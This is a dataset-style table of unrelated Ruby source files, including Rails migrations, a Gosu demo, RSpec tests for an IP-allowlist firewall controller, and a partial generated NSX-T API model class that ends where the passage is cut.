hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e825093059d3f86e96914aeeac62ad7e03262d48 | 206 | class AddSubmittedAtToEvaluation < ActiveRecord::Migration
def self.up
add_column :evaluations, :submitted_at, :datetime
end
def self.down
remove_column :evaluations, :submitted_at
end
end
| 20.6 | 58 | 0.76699 |
08161ad1c6ec89bceb410fb921610365705392e8 | 362 | if defined?(ActiveRecord)
module ActiveRecord
module ConnectionAdapters
class ConnectionPool
def force_new_connection
old_lock = @lock_thread
@lock_thread = nil
with_connection do |conn|
yield conn
end
ensure
@lock_thread = old_lock
end
end
end
end
end | 21.294118 | 35 | 0.582873 |
bbc2648228a027f57dc8d8a9809c062e7136808a | 44 | # Add your variables here
first_number(x,y)
| 14.666667 | 25 | 0.772727 |
5df2b7c32d6f6783515ed84ee0b74baa48910551 | 846 | # frozen_string_literal: true
FactoryBot.define do
factory :project_repository_storage_move, class: 'ProjectRepositoryStorageMove' do
container { association(:project) }
source_storage_name { 'default' }
trait :scheduled do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:scheduled].value }
end
trait :started do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:started].value }
end
trait :replicated do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:replicated].value }
end
trait :finished do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:finished].value }
end
trait :failed do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:failed].value }
end
end
end
| 28.2 | 93 | 0.732861 |
6a2fbfce9ec550184264f4b740b97ce5fc5c54eb | 1,636 | # Encoding: UTF-8
require "gosu"
WIDTH, HEIGHT = 640, 480
class Welcome < (Example rescue Gosu::Window)
PADDING = 20
def initialize
super WIDTH, HEIGHT
self.caption = "Welcome!"
text =
"<b>Welcome to the Gosu Example Box!</b>
This little tool lets you launch any of Gosu’s example games from the list on the right hand side of the screen.
Every example can be run both from this tool <i>and</i> from the terminal/command line as a stand-alone Ruby script.
Keyboard shortcuts:
• To see the source code of an example or feature demo, press <b>E</b>.
• To open the ‘examples’ folder, press <b>O</b>.
• To quit this tool, press <b>Esc</b>.
• To toggle fullscreen mode, press <b>Alt+Enter</b> (Windows, Linux) or <b>cmd+F</b> (macOS).
Why not take a look at the code for this example right now? Simply press <b>E</b>."
# Remove all leading spaces so the text is left-aligned
text.gsub! /^ +/, ""
@text = Gosu::Image.from_markup text, 20, width: WIDTH - 2 * PADDING
@background = Gosu::Image.new "media/space.png"
end
def draw
draw_rotating_star_backgrounds
@text.draw PADDING, PADDING, 0
end
def draw_rotating_star_backgrounds
# Disregard the math in this method, it doesn't look as good as I thought it
# would. =(
angle = Gosu.milliseconds / 50.0
scale = (Gosu.milliseconds % 1000) / 1000.0
[1, 0].each do |extra_scale|
@background.draw_rot WIDTH * 0.5, HEIGHT * 0.75, 0, angle, 0.5, 0.5,
scale + extra_scale, scale + extra_scale
end
end
end
Welcome.new.show if __FILE__ == $0
| 27.266667 | 122 | 0.651589 |
389c9ca51a4e42cb033d052467e83ce6e6764b14 | 99 | # frozen_string_literal: true
# Defines the gem version.
module SlimLint
VERSION = '0.20.2'
end
| 14.142857 | 29 | 0.737374 |
180d785d4d9774bf0668a52964bba2197514a7dc | 1,172 | module SimpleApiAuth
class Request
attr_accessor :headers, :http_verb, :query_string, :uri, :body, :original
def initialize(options = {})
assign_options(options)
@normalizer = SimpleApiAuth.config.request_normalizer.new
@header_field = SimpleApiAuth.config.request_fields[:headers]
self.headers = @normalizer.normalize_headers(headers)
self.http_verb = http_verb.downcase.to_sym
end
def time
header_key = SimpleApiAuth.config.header_keys[:saa_auth_time]
Time.parse(headers[header_key])
rescue ArgumentError, TypeError
nil
end
def add_header(key, value)
headers[key] = value
denormalized_key = @normalizer.denormalize(key)
original.send(@header_field)[denormalized_key] = value
end
def self.create(request)
return request if request.is_a?(Request)
options = {}
SimpleApiAuth.config.request_fields.each do |k, v|
options[k] = request.send(v)
end
Request.new(options.merge(original: request))
end
private
def assign_options(options)
options.each do |k, v|
send("#{k}=", v)
end
end
end
end
| 26.636364 | 77 | 0.670648 |
088b85dd5da4fa1e6ee497bfd48c1c033b2ed312 | 1,386 | # frozen_string_literal: true
class MigrateNullPackageFilesFileStoreToLocalValue < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
JOB_INTERVAL = 2.minutes + 5.seconds
BATCH_SIZE = 5_000
MIGRATION = 'SetNullPackageFilesFileStoreToLocalValue'
disable_ddl_transaction!
class PackageFile < ActiveRecord::Base
self.table_name = 'packages_package_files'
include ::EachBatch
end
def up
# On GitLab.com, there are 2M package files. None have NULL file_store
# because they are all object stored. This is a no-op for GitLab.com.
#
# If a customer had 2M package files with NULL file_store, with batches of
# 5000 and a background migration job interval of 2m 5s, then 400 jobs would
# be scheduled over 14 hours.
#
# The index `index_packages_package_files_file_store_is_null` is
# expected to be used here and in the jobs.
#
# queue_background_migration_jobs_by_range_at_intervals is not used because
# it would enqueue 18.6K jobs and we have an index for getting these ranges.
PackageFile.where(file_store: nil).each_batch(of: BATCH_SIZE) do |batch, index|
range = batch.pluck(Arel.sql("MIN(id)"), Arel.sql("MAX(id)")).first
delay = index * JOB_INTERVAL
migrate_in(delay.seconds, MIGRATION, [*range])
end
end
def down
# noop
end
end
| 31.5 | 83 | 0.726551 |
ac56237b53ab37893f57216ede1c3b79e3e404ea | 233 | class TrialOrderSelectionMapping < ApplicationRecord
belongs_to :trial_order, :foreign_key => "trial_order_id"
belongs_to :user, :foreign_key => "user_id"
belongs_to :phase_definition, :foreign_key => "phase_definition_id"
end
| 38.833333 | 69 | 0.793991 |
f747abdf58f71b7a364a0831f9780c01a5db041b | 387 | class CreateProducts < ActiveRecord::Migration
def self.up
create_table :products do |t|
t.integer :category_id, :vendor_id
t.float :unit_price, :null => false
t.string :description, :name, :null => false
t.integer :status, :product_type, :default => 0, :null => false
t.timestamps
end
end
def self.down
drop_table :products
end
end
| 24.1875 | 69 | 0.648579 |
3923cfca0e5fb5c875e4dcf02d19c6f26750a3b4 | 2,050 | require 'rails_vue_js_spec_helper'
require_relative "../support/test_controller"
require_relative "support/form_test_controller"
require_relative "support/model_form_test_controller"
include VueJsSpecUtils
describe "Form Component", type: :feature, js: true do
before :all do
class DelayFormTestController < FormTestController
def success_submit
receive_timestamp = DateTime.now.strftime('%Q')
render json: { received_at: receive_timestamp }, status: 200
end
end
Rails.application.routes.append do
post '/delay_success_form_test', to: 'delay_form_test#success_submit', as: 'form_delay_success_submit'
end
Rails.application.reload_routes!
end
before :each do
allow_any_instance_of(DelayFormTestController).to receive(:expect_params)
end
describe "delay attribute" do
it "if set, delays form submit" do
class ExamplePage < Matestack::Ui::Page
def response
matestack_form form_config do
form_input key: :foo, type: :text, id: "my-test-input"
button 'Submit me!'
end
div id: "timestamp" do
toggle show_on: "form_submitted_successfully", id: 'async-form' do
paragraph "{{vc.event.data.received_at}}", id: 'received_timestamp'
end
end
end
def form_config
return {
for: :my_object,
method: :post,
path: form_delay_success_submit_path,
delay: 1000,
success: {
emit: "form_submitted_successfully"
}
}
end
end
visit '/example'
submit_timestamp = DateTime.now.strftime('%Q').to_i
fill_in "my-test-input", with: submit_timestamp
click_button "Submit me!"
expect(page).to have_selector(:css, '#received_timestamp', wait: 2)
element = page.find("#received_timestamp")
receive_timestamp = element.text.to_i
expect(receive_timestamp - submit_timestamp).to be > 1000
end
end
end
| 29.710145 | 108 | 0.648293 |
b906c0156fd7db7894e8c4124483d37110d5f9d5 | 863 | require 'spec_helper'
RSpec.describe 'Uniswap integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:dai_eth_pair) { Cryptoexchange::Models::MarketPair.new(base: 'dai', target: 'eth', market: 'uniswap') }
it 'fetch pairs' do
pairs = client.pairs('uniswap')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'uniswap'
end
it 'fetch ticker' do
ticker = client.ticker(dai_eth_pair)
expect(ticker.base).to eq 'DAI'
expect(ticker.target).to eq 'ETH'
expect(ticker.market).to eq 'uniswap'
expect(ticker.volume).to be_a Numeric
expect(ticker.last).to be_a Numeric
expect(ticker.high).to be_a Numeric
expect(ticker.low).to be_a Numeric
expect(ticker.payload).to_not be nil
end
end
| 26.96875 | 110 | 0.692932 |
082a4d47a7fad3d1183ab57188362aa74e5ef660 | 1,831 | # frozen_string_literal: true
describe Facter::Resolvers::DMIComputerSystem do
let(:logger) { instance_spy(Facter::Log) }
before do
win = double('Facter::Util::Windows::Win32Ole')
allow(Facter::Util::Windows::Win32Ole).to receive(:new).and_return(win)
allow(win).to receive(:return_first).with('SELECT Name,UUID FROM Win32_ComputerSystemProduct').and_return(comp)
Facter::Resolvers::DMIComputerSystem.instance_variable_set(:@log, logger)
end
after do
Facter::Resolvers::DMIComputerSystem.invalidate_cache
end
describe '#resolve' do
let(:comp) { double('WIN32OLE', Name: 'VMware7,1', UUID: 'C5381A42-359D-F15B-7A62-4B6ECBA079DE') }
it 'detects virtual machine name' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to eql('VMware7,1')
end
it 'detects uuid of virtual machine' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to eql('C5381A42-359D-F15B-7A62-4B6ECBA079DE')
end
end
describe '#resolve when WMI query returns nil' do
let(:comp) {}
it 'logs debug message and name is nil' do
allow(logger).to receive(:debug)
.with('WMI query returned no results for Win32_ComputerSystemProduct with values Name and UUID.')
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to be(nil)
end
it 'detects uuid as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to be(nil)
end
end
describe '#resolve when WMI query returns nil for Name and UUID' do
let(:comp) { double('WIN32OLE', Name: nil, UUID: nil) }
it 'detects name as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to be(nil)
end
it 'detects uuid as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to be(nil)
end
end
end
| 32.122807 | 115 | 0.703441 |
038de5c18e5d3cf8f61c6c6b419ba0aba25d713c | 19,037 | require 'spec_helper_min'
require 'support/helpers'
require 'helpers/feature_flag_helper'
require 'spec_helper'
class TestFirewallManager
@rules = {}
@config = nil
class <<self
attr_reader :rules, :config
attr_writer :config
end
def initialize(config)
@config = config
TestFirewallManager.config = config
end
attr_reader :config
def delete_rule(rule_name)
raise "FIREWALL DELETE ERROR" unless TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules.delete rule_name
end
def create_rule(rule_name, ips)
raise "FIREWALL CREATE ERROR" if TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules[rule_name] = ips
end
def update_rule(rule_name, ips)
raise "FIREWALL UPDATE ERROR" unless TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules[rule_name] = ips
end
end
class TestErrorFirewallManager
def initialize(config)
end
def delete_rule(rule_name)
raise "FIREWALL ERROR"
end
def create_rule(rule_name, ips)
raise "FIREWALL ERROR"
end
def update_rule(rule_name, ips)
raise "FIREWALL ERROR"
end
end
describe Carto::Api::DbdirectIpsController do
include_context 'users helper'
include HelperMethods
include FeatureFlagHelper
include Rack::Test::Methods
def rule(id)
"<<#{id}>>"
end
before(:all) do
host! "#{@carto_user1.username}.localhost.lan"
@feature_flag = FactoryGirl.create(:feature_flag, name: 'dbdirect', restricted: true)
@config = {
firewall: {
enabled: true,
rule_name: '<<{{id}}>>'
}
}.with_indifferent_access
@sequel_organization = FactoryGirl.create(:organization_with_users)
@organization = Carto::Organization.find(@sequel_organization.id)
@org_owner = @organization.owner
@org_user = @organization.users.reject { |u| u.id == @organization.owner_id }.first
end
after(:all) do
@feature_flag.destroy
@organization.destroy
end
after(:each) do
logout
end
describe '#update' do
before(:each) do
@params = { api_key: @carto_user1.api_key }
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
end
after(:each) do
Carto::DbdirectIp.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for ips creation' do
params = {
ips: ['100.20.30.40']
}
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(401)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
it 'needs the feature flag for ips creation' do
params = {
ips: ['100.20.30.40'],
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(403)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
it 'creates ips with api_key authentication' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'creates ips with login authentication' do
ips = ['100.20.30.40']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'retains only latest ips assigned' do
ips1 = ['100.20.30.40', '200.20.31.0/24']
ips2 = ['11.21.31.41']
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
params = {
ips: ips1,
api_key: @carto_user1.api_key
}
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips1
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips1
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips1
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
params = {
ips: ips2,
api_key: @carto_user1.api_key
}
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips2
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips2
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips2
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'rejects invalid IPs' do
invalid_ips = [
['0.0.0.0'], ['10.20.30.40'], ['127.0.0.1'], ['192.168.1.1'],
['120.120.120.120/20'], ['100.100.100.300'], ['not-an-ip'],
[11223344],
'100.20.30.40'
]
invalid_ips.each do |ips|
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(422)
expect(response.body[:errors]).not_to be_nil
expect(response.body[:errors][:ips]).not_to be_nil
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
end
it 'IP ranges in firewall are normalized' do
ips = ['100.20.30.40', '12.12.12.12/24']
normalized_ips = ['100.20.30.40', '12.12.12.0/24']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq normalized_ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'IP changes affect all the organization members' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @org_user.api_key
}
with_host "#{@org_user.username}.localhost.lan" do
with_feature_flag @org_user, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json dbdirect_ip_url(params.merge(host: host)) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@org_user.reload.dbdirect_effective_ips).to eq ips
expect(@org_owner.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@organization.name)]).to eq ips
expect(TestFirewallManager.rules[rule(@org_user.username)]).to be_nil
expect(TestFirewallManager.rules[rule(@org_owner.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@org_user.dbdirect_effective_ip.firewall_rule_name).to eq rule(@organization.name)
expect(@org_owner.dbdirect_effective_ip.firewall_rule_name).to eq rule(@organization.name)
end
end
end
end
end
it 'returns error response if firewall service fails' do
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestErrorFirewallManager)
ips = ['100.20.30.40']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(500)
expect(response.body[:errors]).to match(/FIREWALL ERROR/)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
it 'omits firewall management if not enabled' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
config = {
firewall: {
enabled: false,
rule_name: '<<{{id}}>>'
}
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules).to be_empty
expect(TestFirewallManager.config).to be_nil
end
end
end
end
it 'omits firewall management by default' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: {} do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules).to be_empty
expect(TestFirewallManager.config).to be_nil
end
end
end
end
end
describe '#destroy' do
before(:each) do
@params = { api_key: @carto_user1.api_key }
@existing_ips = ['100.20.30.40']
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
Cartodb.with_config dbdirect: @config do
@carto_user1.dbdirect_effective_ips = @existing_ips
TestFirewallManager.rules[rule(@carto_user1.username)] = @existing_ips
end
end
after(:each) do
Carto::DbdirectIp.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for ips deletion' do
params = {}
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(401)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
it 'needs the feature flag for ips deletion' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(403)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'deletes ips with api_key authentication' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
end
end
end
end
it 'deletes ips with login authentication' do
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
end
end
end
end
it 'returns error response if firewall service fails' do
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestErrorFirewallManager)
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(500)
expect(response.body[:errors]).to match(/FIREWALL ERROR/)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'omits firewall management if not enabled' do
config = {
firewall: {
enabled: false,
rule_name: '<<{{id}}>>'
}
}
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'omits firewall management by default' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: {} do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
end
describe '#show' do
before(:each) do
@ips = ['100.20.30.40']
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
Cartodb.with_config dbdirect: @config do
@carto_user1.dbdirect_effective_ips = @ips
end
TestFirewallManager.rules[rule(@carto_user1.username)] = @ips
end
after(:each) do
Carto::DbdirectCertificate.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for showing ips' do
params = {
}
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(401)
end
end
end
it 'needs the feature flag for showing ips' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(403)
end
end
end
end
it 'shows ips with api key authentication' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq @ips
end
end
end
end
it 'shows ips with login authentication' do
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
login_as(@carto_user1, scope: @carto_user1.username)
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq @ips
end
end
end
end
it 'returns empty ips array when not configured' do
params = {
api_key: @carto_user1.api_key
}
Cartodb.with_config dbdirect: @config do
@carto_user1.reload.dbdirect_effective_ips = nil
end
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq []
end
end
end
end
end
end
| 34.177738 | 107 | 0.636602 |
626d44ba0a20a4d3c9396408cd933e4c73a42f1a | 628 | require 'rails_helper'
require 'ruby_prof'
module RailsProbe
module Printers
RSpec.describe GraphText do
let(:result) { double('result') }
let(:report) { double('report') }
let(:action) { double('action') }
subject { described_class.new(result, report, action) }
describe '::PRINTER' do
it 'returns the RubyProf printer class' do
expect(GraphText::PRINTER).to eq(RubyProf::GraphPrinter)
end
end
describe '#name' do
it 'returns name of the printer' do
expect(subject.name).to eq('Graph Text')
end
end
end
end
end
| 23.259259 | 66 | 0.611465 |
187376b9c32a65fad749c6fc2f8abff28b1d8b1a | 59 | module Mobb
module Redis
VERSION = '1.0.0'
end
end
| 9.833333 | 21 | 0.627119 |
91d65d521c5be5be18110285b4a3b0ef815e0fcb | 20,586 | =begin
#NSX-T Manager API
#VMware NSX-T Manager REST API
OpenAPI spec version: 2.5.1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXT
# Represents a Label-Value widget configuration
class LabelValueConfiguration
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# The _revision property describes the current revision of the resource. To prevent clients from overwriting each other's changes, PUT operations must include the current _revision of the resource, which clients should obtain by issuing a GET operation. If the _revision provided in a PUT request is missing or stale, the operation will be rejected.
attr_accessor :_revision
# Indicates system owned resource
attr_accessor :_system_owned
# Title of the widget. If display_name is omitted, the widget will be shown without a title.
attr_accessor :display_name
# Description of this resource
attr_accessor :description
# Opaque identifiers meaningful to the API user
attr_accessor :tags
# ID of the user who created this resource
attr_accessor :_create_user
# Protection status is one of the following: PROTECTED - the client who retrieved the entity is not allowed to modify it. NOT_PROTECTED - the client who retrieved the entity is allowed to modify it REQUIRE_OVERRIDE - the client who retrieved the entity is a super user and can modify it, but only when providing the request header X-Allow-Overwrite=true. UNKNOWN - the _protection field could not be determined for this entity.
attr_accessor :_protection
# Timestamp of resource creation
attr_accessor :_create_time
# Timestamp of last modification
attr_accessor :_last_modified_time
# ID of the user who last modified this resource
attr_accessor :_last_modified_user
# Unique identifier of this resource
attr_accessor :id
# Supported visualization types are LabelValueConfiguration, DonutConfiguration, GridConfiguration, StatsConfiguration, MultiWidgetConfiguration, GraphConfiguration and ContainerConfiguration.
attr_accessor :resource_type
# The 'datasources' represent the sources from which data will be fetched. Currently, only NSX-API is supported as a 'default' datasource. An example of specifying 'default' datasource along with the urls to fetch data from is given at 'example_request' section of 'CreateWidgetConfiguration' API.
attr_accessor :datasources
# Specify relavite weight in WidgetItem for placement in a view. Please see WidgetItem for details.
attr_accessor :weight
# Icons to be applied at dashboard for widgets and UI elements.
attr_accessor :icons
# Please use the property 'shared' of View instead of this. The widgets of a shared view are visible to other users.
attr_accessor :shared
attr_accessor :footer
# Id of drilldown widget, if any. Id should be a valid id of an existing widget. A widget is considered as drilldown widget when it is associated with any other widget and provides more detailed information about any data item from the parent widget.
attr_accessor :drilldown_id
# Set to true if this widget should be used as a drilldown.
attr_accessor :is_drilldown
# Legend to be displayed. If legend is not needed, do not include it.
attr_accessor :legend
# Layout of properties can be vertical or grid. If layout is not specified a default vertical layout is applied.
attr_accessor :layout
# Hyperlink of the specified UI page that provides details.
attr_accessor :navigation
# A sub-type of LabelValueConfiguration. If sub-type is not specified the parent type is rendered. For VERTICALLY_ALIGNED sub_type, the value is placed below the label.
attr_accessor :sub_type
# An array of label-value properties.
attr_accessor :properties
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'_revision' => :'_revision',
:'_system_owned' => :'_system_owned',
:'display_name' => :'display_name',
:'description' => :'description',
:'tags' => :'tags',
:'_create_user' => :'_create_user',
:'_protection' => :'_protection',
:'_create_time' => :'_create_time',
:'_last_modified_time' => :'_last_modified_time',
:'_last_modified_user' => :'_last_modified_user',
:'id' => :'id',
:'resource_type' => :'resource_type',
:'datasources' => :'datasources',
:'weight' => :'weight',
:'icons' => :'icons',
:'shared' => :'shared',
:'footer' => :'footer',
:'drilldown_id' => :'drilldown_id',
:'is_drilldown' => :'is_drilldown',
:'legend' => :'legend',
:'layout' => :'layout',
:'navigation' => :'navigation',
:'sub_type' => :'sub_type',
:'properties' => :'properties'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'_revision' => :'Integer',
:'_system_owned' => :'BOOLEAN',
:'display_name' => :'String',
:'description' => :'String',
:'tags' => :'Array<Tag>',
:'_create_user' => :'String',
:'_protection' => :'String',
:'_create_time' => :'Integer',
:'_last_modified_time' => :'Integer',
:'_last_modified_user' => :'String',
:'id' => :'String',
:'resource_type' => :'String',
:'datasources' => :'Array<Datasource>',
:'weight' => :'Integer',
:'icons' => :'Array<Icon>',
